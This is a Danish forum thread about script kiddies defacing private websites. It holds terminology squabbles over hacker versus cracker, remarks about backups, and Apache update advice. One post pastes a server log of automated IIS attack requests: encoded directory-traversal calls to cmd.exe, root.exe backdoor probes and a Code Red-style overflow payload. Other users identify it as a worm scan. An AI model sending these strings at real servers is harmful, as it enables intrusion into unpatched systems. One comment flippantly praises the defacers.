Script Kiddies amok i Danmark

Hvad er det sjove i det?

De kan resikere en rimelig stor straf!

Mon ikke bare det er en flok idioter, der gør det for at prale over deres kammerater. Eller nogle der øver sig inden de angriber de store.

Hvad er 'Script Kidides' for nogle?

#3
Wannabe-crackers

du mener vel hackers

Det er sgu da svært at ha' respekt for folk der hacker små private (let tilgængelige) hp's..

-Slacz-

#5
Nej din ***** jeg mener ikke hackere, jeg mener crackere.

#5 Øhhh .. der er nu CRACKERE !!! .. børnehave børn .. eller som sagt SCRIPKIDDIES

Nu hedder og staves det altså helt korrekt 'script kiddies', 'Kidides' er der ik noget der hedder, fejl i overskriften.

[very common] The lowest form of cracker; script kiddies do mischief with scripts and programs written by others, often without understanding the explot they are using.

Kort sagt på dansk så er det amatøre/nørder som sidder og leger med diverse hacker programmer fra nettet af, og som altså ikke kan hacke hjemmesider rigtigt.

Hvis folk ellers har fulgt lidt med i medierne så menes det at være 2 revaliserende udenlandske grupper som bare konkurrere i hvem der kan nedlægge flest hps. Dvs. de er totalt ligeglade med hvad det er for sider de angriber, de går kun op i hvor mange de kan hacke uanset sværhedsgraden.
Når de ikke kan gøre sig bemærkede i 'skills' og tage de sikrede sites/sider, så prøver de at gøre sig bemærkede på andre måder....

yep, vist nogle fra brazil, der har gang i danmark

De brasilianske gadebørn skulle ha' en pose småkager.....smask....læg sig !

#5:

For at quote Eric S. Raymond (ja den Eric Raymond) -

"The basic difference is this: hackers build things, crackers break them."

-
/Graffen

Ja, hvis det bliver en hobby for for mange hacker grupper,
bliver får hacking nok snart en ny mening på interentetet.

Måske kan folk nu se at hacking ikke er andet end meget
irriterende... altså for folk som har brugt tid på at
få noget på fødderne, bare så nogle 14 årige nørder kan
slette det igen, og fylde ud med et logo de sikkert har
taget fra en andens hjemmeside... ynkeligt.

- bare en mening.

meget irriterende.

er min Apache/1.3.23 Server sikker nok eller er den for gammel ?

Minder mig om jeg nok heller skal lave et backup af min server ;P

Hvor svært kan det være at få lukket de huller ? Gider ikke at sammeligne dem med crackere, (det er at gøre dem en tjenste) for det de gør skulle efter sigende være noget af det mest lame et script kid kan gøre, nemlig at fjerne startsiden og lægge deres egen lamer startside ind !

Hvis nu folk tog backup (og det har de højst sandsynligt gjort) så kunne de nemt udredde det.

Og i øvtigt, hvorfor gøre disse fucked up kiddies en tjenste at fylde tv og net med deres crap.

//
Lige en ting mere, hvor svært kan det egentligt være at forstå forskellen på en cracker og en hacker ??
//

man skal ikke kaste med sten når man er et glashus vel !

Cracker = They make 'em, we break 'em!

Det er def. på en cracker! Har været det siden 1984.

Cracker = Cracks the protection-code of games/movies/utills./ect.

sphinx det er nemlig korrekt

Well - kald dem hvad i vil..
Problemet ligger skam for det emeste i de password folk vælger til deres hjemmeside. De er ALT for nemme at gætte. Folk tænker sig simpelthen ikke om når de laver dem, og så ender de med at være så lette at det faktisk er pinligt at kende dem. Når først nogle unge har fundet ud af hvor lette sådan nogle password er, så skal man ikke engang bruge et program for at finde dem, de kan bare logge in på siden og finder nogle af de vigtige ting, så som, vejnavne, efternavne, fornavne eller skam noget af navnet i url'et. Så når de har fundet ud at mange folk er dummere end snot til at lave password på de små pirvate hjemmesider, så er det jo logik det er dem der bliver angrebet.
EOD.

#20:
Nej, de bruger meget kendte huller i IIS og MySQL...

Det er sku for skummelt, jeg installerede apache 1.3.27 på en 2000pro maskine i lørdags og allerede om søndagen var der skumle ting i loggen..noget med "/get http1.1 CONNECT maila.microsoft.com 25" Men det var vel dem der var på spil.

Øhh hmm okey.. og hvad er så lige det sjove ved at angribe private hjemmesider..??!! :

Eric S. Raymond er en billig luderkarl.

Nu har jeg ikke så meget forstand på Apache (ved hvordan man installere det osv.) men ligner dette ikke lidt et angreb?? Jeg kender i hvert tilfælde ikke IP'et og det er først inden for de sidste tre uger det optræder i loggen (Er der vel en 30 - 40 gange, blot med forskellig IP):213.221.189.10 - - [19/Oct/2002:10:30:35 +0100] "CONNECT 213.221.189.10:6660 HTTP/1.0" 200 2027195.25.227.44 - - [19/Oct/2002:15:37:35 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 75862.243.140.190 - - [19/Oct/2002:19:59:44 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:45 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:45 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:48 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:48 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:48 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:19:59:49 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:20:00:10 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 68462.243.140.190 - - [19/Oct/2002:20:00:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 68462.243.140.190 - - [19/Oct/2002:20:00:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75762.243.140.190 - - [19/Oct/2002:20:00:11 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75768.33.97.105 - - [19/Oct/2002:22:08:46 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090 %u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090 %u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 34280.15.69.195 - - [21/Oct/2002:01:58:05 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:06 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:06 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:07 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:07 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:07 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:08 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:08 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:09 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:09 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:10 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:10 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 68480.15.69.195 - - [21/Oct/2002:01:58:11 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 68480.15.69.195 - - [21/Oct/2002:01:58:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 75780.15.69.195 - - [21/Oct/2002:01:58:12 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 757Hmmmm..... Forum spam.... ups.... :)//ZyBo[SE]

okkkk dvs min Apache/1.3.23 er noget gammel gejl og livsfarlig..

eller er den god nok

#26
Siden der er kommet en .27 version ud, er der nok nogle sikkerheds huller der er blevet lukket..så hvis du vil være sikker hent den nyeste på www.apache.org Er heldigvis meget svært at udnytte mange af bugs'ene..men det betyder ikke det er umuligt

jeg er sgu for doven :)

A cracker is someone who breaks into someone else's computer system, often on a network. A cracker can be doing this for profit, maliciously, for some altruistic purpose or cause, or because the challenge is there. Some breaking-and-entering has been done ostensibly to point out weaknesses in a site's security system. The term "cracker" is not to be confused with ">hacker". Hackers generally deplore cracking. However, as Eric Raymond, compiler of The New Hacker's Dictionary notes, some journalists ascribe break-ins to "hackers." A classic story of the tracking down of a cracker on the Internet who was breaking into U.S. military and other computers is told in Clifford Stoll's The Cuckoo's Egg.
//
Z.E.R.O.........hvem fanden har bestemt at du har ret ??
//

cisco stop med dit klippe/klistre propaganda

IP 80.15.69.195 = en fransk ADSL brugere.

Og det ser ud til at et program har udført et Scan
efter sådbarheder til en IIS srv.

Så er det jo godt at have Apache :)

Nielsen @ www.tdn.dk

zybo: ganske almindeligt fuld-automatiseret angreb. :) Min indianer bliver udsat for det nærmest dagligt. De skulle meget gerne kun få 404'ere ud af det ;)

HERO : hvis du er for doven til at update dit tus .. hvordan kan du så ha noia og blive hacket ?

Det her minder mig om nærmest mest om de idioter man gik i klasse med i folkeskolen, som syntes at det var fedt at udøve hærværk. Nu smadrer de bare hjemmesider istedet for håndvaske.

Normalt er jeg imod vold(Ja ja, min bare røv...), men Script Kiddies er et område hvor jeg synes at revselsesretten burde geninføres. 10 rap med spanskrørret for hver side de har defaced, så tror jeg nok de kunne finde på andet at lave.

Hacker eller cracker?

Er egenligt kold, men efter min mening er definitionen blevet "vendt om" gennem tiden.

Dengang JEG var barn (LOL) var en hacker en person under "cyberpunk kulturen", der brød ind i computer systemer for at frigive den information der lå på dem og en cracker brød ind i software (og gav det til os andre ;) ).

Og så kan folk kalde det hvad faen de har lyst til idag, men jeg holder mig til den definition som har været brugt fra starten af cyberpunk kulturen.

For folk der er i tvivl om hvad der er hvad og hvorfor man nu gør som man gør og ikke gør mod private!!!!!!
læs:
http://www.fyldepennen.dk/tekster/839

jeg går snart amokk i blackhats og hader de bruger hacker termenalogien...de er onde og det ønsker jeg ikke at være
;-)

doh! som folk dog bliver ved med at gentage hvad andre allerede har skrevet.

#25 og ja de har der scanned din server for kendte sådbarheder i IIS serveren. Noget der kan gøres med simple programmer/tools fra nettet af, og det viser kun at det ER script kiddies der er ude og ikke prof hackere.

Jeg griner da mest over hende der i nyhederne der udtalte at nu viste hun ik om hun gad starte forfra med sin hjemmeside for måske bare senere igen se at den var slettet. Har hun for h... da ik hørt om backup? eller at man laver en website offline først og derefter uploader den. Man har sq da en kopi normaltvis. Det er sq da bare at uppe kopien igen, og så ville hun være kørende igen med sin site.

#37
Det var præsis det samme jeg sad og tænkte da jeg så hende på skærmen.
HVOR DUM KAN EN KO GÅ HEN OG BLIVE?

Hvor svært kan det være at fatte at:

1. Folk der bryder ind i computersystemer kalder sig hackere.
2. Folk der knækker kopibeskyttelser kalder sig crackere.

Så er det da pisseligemeget hvad ESR den bitre prut synes om den sag.

ja lige netop


1. Folk der bryder ind i computersystemer <STRONG>kalder sig </STRONG>hackere.
2. Folk der knækker kopibeskyttelser <STRONG>kalder sig </STRONG>crackere.

og det er sådan de er kendt i folkemunde

at der så sidder nogle fede elitære programmører og mener at de har patent på ordet hacker kan resten af verdens befolkning da heldigvis være pisse ligeglade med.

mand eller mus????

er du mand med nosser og du får slettet / overskrevet din hjemme side så venter dig en time med programering og musne uploader bare den igen da de har en kopi på en harddisk

er du mand eller mus???

Kan sq ik lige se hvorfor fanden der er grund til at diskuterer hacker/cracker.. Den diskution har jo kun været oppe i snit 5 gange på en måned det sidste år.... Kald det dog hvad i vil, jeg vælger at kalde det hacker that's it...

Men de er da vist nogle rigtige wannabe's, de sku slet ik have den opmærksomhed som de allerede har fået...

//Out Mortenen

ooOO(Har bare siddet og brainet unden at tænke sønderligt meget over hvad jeg har skrevet...)

#39
Det er jo hvad det er blevet til nu, fordi ordet har (hacker) har mistet sin rigtige betydning. Og det var formentlig fordi journalisterne som skrev om det i sin tid ikke vidste hvad de skrev om (surprise)
Men det er jo en udvikling i sproget, ligesom de fleste under 30 ikke kan finde ud af at bruge hans/sin rigtigt. Når det er alle under 50 laver de officielt sproget om.

Min holdning til den slags angreb er:

Hvorfor fanden gøre noget stort ud af så lidt?
Medierne for det til at lyde som om det er det vilde der er sket, og at det faktisk har ødelagt flere hundrede menneskers liv. Men det har det jo forfanden da ikke. De gutter der har gjort det, har jo sådan set bare befriet os for alt muligt ubrugligt skrammel, som man bliver oversvømmet med, hvis man ikke søger særlig specifikt. Jeg mener, når mennerskerne det er gået udover for det til at lyde som deres verdens undergang. Ja, så burde de jo ikke have lov at bruge en computer, eller de kunne i det mindste sætte sig ind i brugen af en før de udtaler sig til pressen osv.

Så jeg har ikke det mindste ondt i røven over at nogle har befriet mig for hjemmesider, som iøvrigt også tit er grimme og for store, eftersom folkene bag den ikke har fattet at et .bmp billede fylder mere end .jpg eller .gif.

Altså mener jeg at dem der har gjort det skulle have en medalje.

/ Badeanden

(NU VENTER JEG SÅ PÅ AT FÅ NOGLE VERBALE TÆSK AF ALLE JER MED EN ANDEN HOLDNING.)

Plat at nogen finder det fedt, at cracke alm. folks hjemmesider.
Minder mig mest om de drengerøve, der river røret af i telefonboksene.
Og spar mig så lige for nogen lektioner, Brug jeres defination så bruger jeg min!.. ;)

#26 Hero, kan komme helt an på om det er en ren apache eller det er en der kommer fra en deb/rpm pakke, debian backporter i hvert fald fixes til den version er der i deres stable istedet for at smide en ny version (muligvis med nye bugs) ind

#45 <STRONG>sKIDROw</STRONG>
Udover din definition er jeg dybt enig :)

gathond det var den der fulgte med min redhat

#43 - Ja sådan er udviklingen jo. Ellers ville en hacker nemlig stadig være en der lavede møbler med en økse ;)

Undskyld men... Hvorfor script kiddies? Hvor ved I det fra? Kender I dem? Hvis I nu peger på #25, så er det altså bare en normal virus ala nimda, så den holder ingen steder, så derfor: Hvor ved I fra at det er script kiddies og ikke hackere (fri mig for flamewar om begreber)?